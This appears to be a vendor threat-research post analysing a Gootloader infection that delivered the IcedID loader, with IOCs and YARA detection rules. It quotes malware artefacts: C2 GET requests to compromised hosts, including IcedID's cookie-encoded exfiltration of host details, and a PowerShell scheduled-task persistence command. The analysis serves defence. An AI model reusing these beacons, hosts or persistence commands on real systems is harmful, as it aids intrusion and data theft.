Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Get unlimited Incident Response with threat suppression guarantee - anytime, anywhere.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT Security researchers from SpearTip have identified an ongoing campaign which employs Fasthttp to conduct bruteforce and Multi-Factor Authentication (MFA) fatigue…
Jan 14, 2025THE THREATOn January 14th, Fortinet disclosed an actively exploited critical zero-day vulnerability impacting multiple versions of FortiOS and FortiProxy. The vulnerability, tracked as…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Gootloader is a Malware-as-a-Service (MaaS) offering that is spread through Search Engine Optimization (SEO) poisoning to distribute malicious payloads, such as IcedID. Threat actors have begun using IcedID, a former banking trojan, since it’s a stealthier option compared to Cobalt Strike.
In fact, the eSentire Threat Response Unit (TRU) team recently published a security advisory, The Popular Malware Downloader, GootLoader, Expands its Payloads Yet Again, Infecting a Law Firm with IcedID, that outlined TRU’s discovery of threat actors deploying IcedID onto a law firm’s IT environment via an employee’s computer. However, our team of 24/7 Cyber SOC Analysts immediately isolated the infected endpoint and worked with TRU to diagnose the malware as IcedID after cleaning the endpoint.
This malware analysis is a deeper technical dive of how Gootloader and IcedID are deployed and our security recommendations to protect your organization from being exploited.
eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file. The ZIP archive contains the JavaScript malicious file that is responsible for reaching out to one of three hardcoded domains to retrieve the second-stage payload.
As mentioned previously, the infection starts when a user visits an infected website and downloads a ZIP archive which contains a highly obfuscated malicious JavaScript file. The filename in most cases includes the keyword “agreement”. Gootloader leverages SEO poisoning to deliver the initial payload as shown in Exhibit 1.
When visiting one of the many compromised websites, the user is served with a Gootloader landing page that includes the link to the malicious ZIP archive (Figure 2). Since the user’s location and browser information is recorded during the visit, if the user visits a subsequent infected webpage, they will not be served with another Gootloader payload.
The JavaScript file within the ZIP archive decodes itself during the runtime and reaches out to one of the three hardcoded compromised websites.
The script checks if the infected host is a part of the Active Directory domain by using the environment variable %USERDNSDOMAIN%, the variable contains the FQDN (fully qualified domain name) of the computer. If the infected host successfully logs on to one of the malicious domains, the value “4173581” appends to the URL GET request that gets sent to the C2 server. If one of the C2 servers provided in the L parameter doesn’t respond with status code 200, the script sleeps for 23.232 seconds (23232 milliseconds) and attempts to connect to the next URL (Exhibit 3).
The GET request (on a domain joined machine):
GET /test.php?cvtbyyxsqwsw=201492074208614154173581 HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: www[.]liveshopping-aktuell[.]de
Upon the successful communication with the C2 channel, Gootloader serves the second-stage payloads to the infected host from one of the infected websites in less than 2 minutes from the execution of the JavaScript file. The first main encoded payload is written to the registry key under HKEY_CURRENT_USER\SOFTWARE\Microsoft\username\ via Wscript process using RegWrite Method (Exhibits 4-5).
The second payload is written to HKEY_CURRENT_USER\SOFTWARE\Microsoft\username0\ (Exhibit 6). The payload is a 32-bit DLL (Dynamic Link Library) written in C# and is named as powershell.dll. The C# payload is responsible for decoding the main payload by replacing the ASCII characters with numeric values within Test() Class (Exhibit 7).
eSentire TRU previously observed Gootloader writing Cobalt Strike payloads under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username0\ and HKEY_CURRENT_USER\SOFTWARE\Microsoft\Phone\username\ registry keys.
Gootloader uses process hollowing techniques (i.e., replacing the legitimate executable section of the process with a malicious code by hollowing or unmapping its memory) to inject the main payload into the PowerShell process via Foad() Class using APIs such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory and ResumeThread as shown in Exhibit 8. Previously, GootLoader was observed to inject the payloads into ImagingDevice.exe process.
In some cases, we have observed the scheduled task is created as a persistence mechanism to decode the registry values by replacing “#” with “1000” and reflectively loads the second decoder payload in-memory. The script is base64-encoded and executed via PowerShell (Exhibits 9-10).
The following code block responsible for creating the scheduled task (the scheduled task is named after the username):
$yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E $ibs -Ar $zb) -Tr (New-ScheduledTaskTrigger -AtL -U $yl))
eSentire TRU was able to identify the main payload as IcedID.
The sample was compiled on May 25th, 2022, which was 5 days before the infection. The packed sample is 147 KB in size (MD5: 157d12885e5f6434436862aadd6224cd). The executable was compiled using MingW GCC. The unpacked sample is only 16 KB in size (MD5: 578143ef946796590c0dd5f5dcfdada7).
IcedID performs anti-VM/anti-sandboxing techniques to check if it’s running in a sandbox environment using RDTSC (Read Time Stamp Counter) instruction to get a processor’s time stamp counter as well as CPUID, SwitchToThread instructions with a loop for an accurate measurement during the calculation of the execution times (Exhibit 11).
IcedID gathers the information on the infected machine and transfers it via the Cookie parameter with GET request as shown below:
GET / HTTP/1.1 Connection: Keep-Alive Cookie: __gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; _u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; _gid=0068595A4472 Host: ilekvoyn[dot]com
Breakdown of the Cookie parameters:
After successfully connecting to the C2 server, IcedID drops the payload in ProgramData folder (Exhibits 16-17).
As we can see, the unpacked IcedID payload is relatively small, but it contains the capabilities that threat actor(s) need to deploy a secondary payload from the C2 server. IcedID was observed to deliver Cobalt Strike, Conti ransomware, Quantum ransomware, and XingLocker ransomware in the past.
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create positive security outcomes for our customers. We take a holistic approach to combat modern cybersecurity threats by deploying countermeasures, such as:
Our detection content is supported by investigation runbooks, ensuring our 24/7 Cyber SOC Analysts respond rapidly to any intrusion attempts related to a known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
We recommend implementing the following controls to help secure your organization against Gootloader and Iced ID malware:
While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Name | Indicators |
IcedID packed payload | 157d12885e5f6434436862aadd6224cd |
IcedID unpacked payload | 578143ef946796590c0dd5f5dcfdada7 |
IcedID C2 | ilekvoyn[dot]com |
Gootloader C2 | www[dot]liveshopping-aktuell[dot]de |
Gootloader C2 | www[dot]lightnessofbeing[dot]net |
Gootloader C2 | www[dot]lintelconsulting[dot]co[dot]uk |
employee confidentiality agreement texas(9898).zip - Gootloader initial payload (ZIP archive) | 1c822f5a7d92307f9cf8ad5f28f61a76 |
employee_confidentiality_agreement_texas 19855.js - Gootloader initial payload (JavaScript file) | c6bac95375b8c7fb3b16c7dff98d2cc0 |
IcedID campaign ID | 277708695 |
rule gootloader_JS { meta: description = "Detects Gootloader JavaScript file" author = "eSentire TI" date = "06/13/2022" strings: $a = "w+" $a1 = "x\\" $a2 = "Sp" $a3 = "E\\" $a4 = "function" $a5 = "while" condition: all of ($a*) and filesize < 300KB }
rule IcedID_loader { meta: description = "Detects IcedID loader" author = "eSentire TI" date = "06/13/2022" strings: $a = "oCookie: _s=" wide fullword nocase $a1 = "Cookie: __gads=" wide fullword nocase $a2 = "oCookie: _s=" wide fullword nocase $a3 = "__io=" wide fullword nocase $a4 = {63 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C} $a5 = {3B 00 20 00 5F 00 67 00 61 00 3D} $a6 = {3B 00 20 00 5F 00 67 00 69 00 64 00 3D} $a7 = {3B 00 20 00 5F 00 67 00 61 00 74 00 3D} condition: all of ($a*) and filesize < 20KB }
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.